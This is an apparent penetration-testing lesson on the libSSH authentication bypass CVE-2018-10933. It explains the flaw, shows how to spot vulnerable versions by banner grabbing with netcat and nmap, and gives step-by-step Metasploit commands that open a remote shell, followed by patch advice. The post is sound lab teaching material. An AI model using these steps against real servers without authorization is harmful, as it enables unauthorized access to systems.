November 13, 2020
Penetration Testing Lesson: LIBSSH Auth Bypass aka CVE-2018-10933
November 13, 2020
LIBSSH Auth Bypass CVE-2018-10933 Lab Files: https://cydeferepo.s3.ca-central-1.amazonaws.com/libSSH.rar
What is it?:
LibSSH versions 0.6 and above have an authentication bypass vulnerability which an attacker could use to create channels without first performing authentication, resulting in unauthorized access. If the server is presented with an SSH2_MSG_USERAUTH_SUCCESS message instead of the expected SSH2_MSG_USERAUTH_REQUEST message, which would initiate the authentication, the attacker could successfully authenticate without any credentials.
To identify this vulnerability, we can use two tools already located on kali. The first of the two tools is netcat, a computer networking utility used for reading from and writing to network connections using TCP or UDP. The second tool we can use is Nmap, a network scanner used to discover hosts and services on a computer network. This is done by sending packets and analyzing them. The first tool we will cover is Netcat.
To use netcat for discovering the libssh authentication bypass vulnerability, we will need to connect to a port serving the libssh software and view the information the server sends back to us. The technique of connecting to a service and viewing what information is sent back is known as banner grabbing. To perform a banner grab with netcat, we would use the syntax "nc -nv IP port." The option -n tells netcat not to perform a DNS lookup, and the -v option tells netcat to give us a verbose output.
If you look at image 1.1, you will see an example of using Netcat to perform a banner grab against a target IP, which is running SSH on port 22. The SSH server has informed us it is running libSSH version 0.8.1, which tells us this machine is vulnerable to the authentication bypass vulnerability. If the SSH service returns a banner telling us the libSSH software is version 0.6.0 - 0.6.5, 0.7.0 - 0.7.5, or 0.8.0 - 0.8.3, there is a high probability we can exploit the machine.
The next tool we will use to identify the authentication bypass vulnerability is Nmap. Using Nmap, we will perform a service version scan and a banner grab to determine what server version is running. Why perform both? When using Nmap, the conditions of a network could cause your scan results to return invalid information. Performing a banner grab with a scan gives an individual the ability to validate their returned data is correct.
To perform a banner grab and service version scan against port 22 of a target, use the syntax "nmap -p 20 -sV --script=banner IP". The option -p defines a specific port to be scanned rather than the entire port range. The option -sV tells Nmap to probe the port we specified to determine its service/version info. Finally, the --script option tells Nmap to use the Nmap Scripting Engine (NSE) to run a specific script. View image 1.2 to see the results of us running this command.
As you can see in the above image, both the Nmap script and the service scan has informed us the SSH server is libSSH version 0.8.1. Using Nmap and netcat, we have successfully determined there is a high probability this machine could be vulnerable to CVE-2018-10933. You may be asking yourself, what is the next step? Well, it's time for some exploitation!
For this first lesson, the tool we will use for exploiting this vulnerability is Metasploit. As our lessons progress, we will cover more complex ways of exploiting a target. To exploit CVE-2018-10933, we will use an auxiliary module located in Metasploit. To use the auxiliary module, we first need to know the path for it to select it as the active module. Finding this information can be done by running the search command with the term libssh. Image 1.3 shows an example of the search command being run and its results. Metasploit has informed us there is one module we can use: auxiliary/scanner/ssh/libssh_auth_bypass.
After we have identified our module, we need to set our module as active, and we need to set any additional options. To make our module active, we use the command "use auxiliary/scanner/ssh/libssh_auth_bypass," which will tell Metasploit this is the module we wish to use. As you can see in image 1.3, after using this command, our console now displays "auxiliary(scanner/ssh/libssh_auth_bypass)" in the CMD line to inform us the module is active.
To figure out what options need to be set for this module, run the "show options" command. Running the "show options" command for this module gives us a small list of options. For this module, the first thing we need to set is the "RHOSTS" option with our target information. To do this, run the command "set rhosts Target" and replace the word Target with your target's IP or URL information. The second thing we need to set is the cmd option with the command to run bash. To do this, run the command "set cmd bin/bash" Once this is complete, you can run your module by typing the command "run" in the console and pressing enter. See image 1.4 for an example of setting the "RHOSTS" and "CMD" option and running the module.
Image 1.4 shows us after we ran the module, we are informed a command shell session has opened. However, we are not presented with the shell session. To interact with the generated shell, we need to type "sessions" to list what sessions are currently active. From the list we are presented within image 1.4, we can identify a session with an ID of 1. If we type "sessions -i 1" we can interact with the shell. Congratulations if you have been following along with the VM you have successfully identified and exploited CVE-2018-10933. HACK THE PLANET!
To mitigate the CVE-2018-10933 vulnerability, apply the patches from https://www.libssh.org/. Additionally, libSSH version 0.8.4 and libssh 0.7.6 have been released to address this issue. Upgrading to one of the newer versions will mitigate this vulnerability.